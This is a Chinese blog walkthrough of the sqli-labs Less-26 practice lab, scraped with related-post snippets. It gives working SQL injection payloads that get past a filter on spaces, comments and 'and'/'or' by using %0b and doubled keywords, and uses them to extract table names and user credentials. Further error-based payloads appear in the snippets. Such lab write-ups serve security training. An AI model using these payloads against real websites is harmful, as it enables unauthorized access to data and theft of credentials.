【网络安全】sqli-labs Less-26 解题详析

原创已于 2025-09-14 08:52:19 修改 · 3.7k 阅读

5 ·

CC 4.0 BY-SA版权

原创文章，禁止转载，否则保留追究法律责任的权利。

文章标签：

#web安全 #数据库 #sql #sqlilabs

于 2023-10-21 16:00:40 首次发布

Sqli-Labs靶场攻防实战专栏收录该内容

28 篇文章

订阅专栏

本文介绍了如何使用SQL注入技术，通过联合查询的方式过滤特定符号并获取数据库名、表名、列名以及用户数据。重点展示了在Sqli-Labs靶场中利用%0b、%0a等特殊字符进行的操作。

正文

本关过滤 空格 or and /* # -- / 等符号

可用过滤符如下：

%09	TAB键（水平）
%0a	新建一行
%0c	新的一页
%0d	return功能
%0b	TAB键（垂直）
%a0	空格

使用联合查询，具体原理及解题方法可见专栏：【Sqli-Labs靶场专栏】

查库名：

id=0'%0bunion%0bselect%0b1,database(),3||'1'='1

回显如下：

在这里插入图片描述

查表名：

id=0'%0bunion%0bselect%0b2,group_concat(table_name),4%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema=database()%26%26'1'='1

回显如下：

在这里插入图片描述

查列名：

id=0'%0bunion%0bselect%0b1,group_concat(column_name),3%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_name='users'%0b%26%26%0btable_schema=database()%26%26'1'='1

回显如下：

在这里插入图片描述

查数据：

id=0'%0bunion%0bselect%0b2,(select%0bgroup_concat(concat_ws('-',id,username,passwoorrd))%0bfrom%0busers),4%0b||%0b'1'='1

回显如下：

在这里插入图片描述

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

秋说

关注关注

6
点赞
踩
5

收藏

觉得还不错? 一键收藏
5
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

SQL-labs的第26关——空格和注释被过滤报错注入（Get）

qq_73393033的博客

08-04

936

我们可以确定'号就是该网站的闭合符号。'号可能是闭合方式。

精选资源

网络安全 - Web 安全靶场 - sqli-labs-php7.zip

10-13

该资源包来源于GitHub上的一个开源项目，由专业的网络安全爱好者或开发者维护和更新。通过sqli-labs-php7.zip，用户可以搭建一个模拟的SQL注入环境，从而在不危害真实系统的前提下，进行各种SQL注入攻击和防御的练习...

5 条评论您还未登录，请先登录后发表或查看评论

5 条评论

爱编程的喵喵 2023.10.21
优质好文，博主的文章细节很到位，兼顾实用性和可操作性，感谢博主的分享，期待博主持续带来更多好文

herosunly 2023.10.21
优质好文，博主的文章细节很到位，兼顾实用性和可操作性，感谢博主的分享，期待博主持续带来更多好文

SQLi LABS Less 25 联合注入+报错注入+布尔盲注

热门推荐

wangyuxiang946的博客

06-28

1万+

SQLi 第二十五关，SQLi-LABS Less-25，SQLi-LABS Less 25，SQLiLABS Less25，SQLi Less 25

sql-labs闯关26~31

qq_44663230的博客

09-03

2917

sql-labs闯关26-28a 29~31暂时不做

sqli-labs靶场第26-30关

yjh20041010的博客

12-16

1116

这关将逻辑运算符，注释符以及空格给过滤了我们先使用单引号进行闭合这时我们查看源代码可以看到这一关过滤了很多字符可以看到这里将or and / -- # 空格等字符都被注释了空格被过滤了我们可以使用()来代替，and和or可以使用双写来绕过因为报错注入空格少，所以这里我们使用报错注入查询数据库名查询表名字段名以及字段下的数据我们获取到了数据库的数据自此通关。

Sqli-labs less 26

weixin_34388207的博客

08-11

261

Less-26 TIPS:本关可能有的朋友在windows下无法使用一些特殊的字符代替空格，此处是因为apache的解析的问题，这里请更换到linux平台下。本关结合25关，将空格，or，and,/*,#,--,/等各种符号过滤，此处对于and，or的处理方法不再赘述，参考25.此处我们需要说明两方面：对于注释和结尾字符的我们此处只能利用构造一个 ' 来闭合后面到 ' ；对于空格，有较多的...

phpstudy+靶场sqli-labs-master下载

11-08

【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全，尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...

sqli-labs-master.zip

01-18

Sqli-labs是一个在线的SQL注入练习平台，提供了一系列关卡供用户练习SQL注入的技巧和防范方法。在这个平台上，用户可以尝试...Sqli-labs旨在帮助网络安全专业人员提高技能和意识，以便更好地应对现实世界中的网络攻击。

sqli-labs-master 靶场环境

最新发布

08-30

sqli-labs-master 靶场环境

精选资源

Sqli-labs-maste 靶场的下载， phpStudy 下载

09-13

在信息技术安全领域，SQL注入是常见的攻击手段，攻击者通过在Web应用的输入字段中插入恶意SQL语句，试图破坏...phpStudy和Sqli-labs-maste的结合使用，为网络安全的学习和研究提供了一个安全、高效、便捷的学习平台。

Sqlilabs Less-26-26a Trick with spaces and comments

baynk的博客

03-31

639

Sqlilabs Less-26 Trick with spaces and comments with single quote 手工注入加quote报错，然后注释没效果，给出的提示看起来似乎是被过滤掉了，用之前手法闭合。然后发现and好像也被过滤了，继续双写试试，但是结果好像空格也被过滤了。。。用了各种编码都不行后，查了资料发现用%a0或者%0b替代(%a0好像是不间断空格，会在html显示...

【sqli-labs】 less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基于错误的去除了空格和注释的注入)...

ajxi63204的博客

01-27

378

看了下源码所有的注释形式和反斜线，and，or都被了过滤掉了单引号没有过滤空格也被过滤了 http://localhost/sqli-labs-master/Less-26/?id=1' http://localhost/sqli-labs-master/Less-26/?id=1' ' 看了网上的一些方法都是使用了%a0替换掉了空格 ...

sqli-labs ----less-26---37--练习

代码审计

03-07

1111

sqli-labs————Less-26（绕空格、/*、#等）该关卡提示空格和注释被转义，我们测试一下： http://www.sqli.com/Less-26/?id=1’报错 sqli-labs-master/Less-26/?id=1’ --+ 依旧报错，我添加的注释不见了，应该是注释被转义成了空字符，我们换成;%00测试一下： http://www.sqli.com/Less-26/?id=1%20and%20sleep(4);%00 and应该被转义了 phpstorm

Sqli-labs之Less-26和Less-26a

m0_46315342的博客

06-04

2852

&nbs...

sqli-labs/Less-26关

m0_71299382的博客

11-20

1725

sqli-labs第二十六关

sqli-labs解题思路之less-26 and less-26a

weixin_73904941的博客

10-04

1511

sqli-labs 第26关和 26a关 sql注入-空格绕过-逻辑符双写绕过-注释符绕过

sqli-labsSQL手工注入第26-30关

m0_75036923的博客

08-24

1317

http://127.0.0.1/Less-26/?id=11%27%26extractvalue(1,concat(%27~%27,database(),%27~%27))%261=%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1

sqllab第二十六关通关笔记

I_WORM的博客

03-16

524

构造payload:id='||extractvalue(1,concat(0x7e,database(),0x7e))='1。发现不行，报错了，换成其他的也不行（%0a %09 %0b %0c %0d %a0）想了半天没结果，不用空格的话没办法执行语句；看了别人的wp发现可以用||进行绕过。构造payload:id=’||exp(710)='1。好了，既然能够绕过入门规则了，下面就要开始获取数据了。构造payload:id=1'+oorr+1='1。构造payload:id='||1='1。

sqli.labs靶场（23关到28a关）

喜欢创作各种技术类文章，希望可以帮到你

02-01

1532

爆数据：1' and 1=2 union select 1,2,group_concat(username,':',password) from users where '1'='1。爆库：31') unionunion select select 1,database(),3 and ('1')=('1。爆库POC：1')%26(substr(database(),1,1)='s')%26('1')=('1。爆库：1' and 1=2 union select 1,2,database()'

[网络安全]sqli-labs Less-1 解题详析

12-25

SQLi-Labs是网络安全领域的一个练习平台，Less-1 是其中一道关于SQL注入攻击的经典题目。在这道题中，你需要利用SQL注入技巧来获取数据库中的敏感信息，通常会涉及HTML表单、GET或POST请求以及对数据库查询构造的...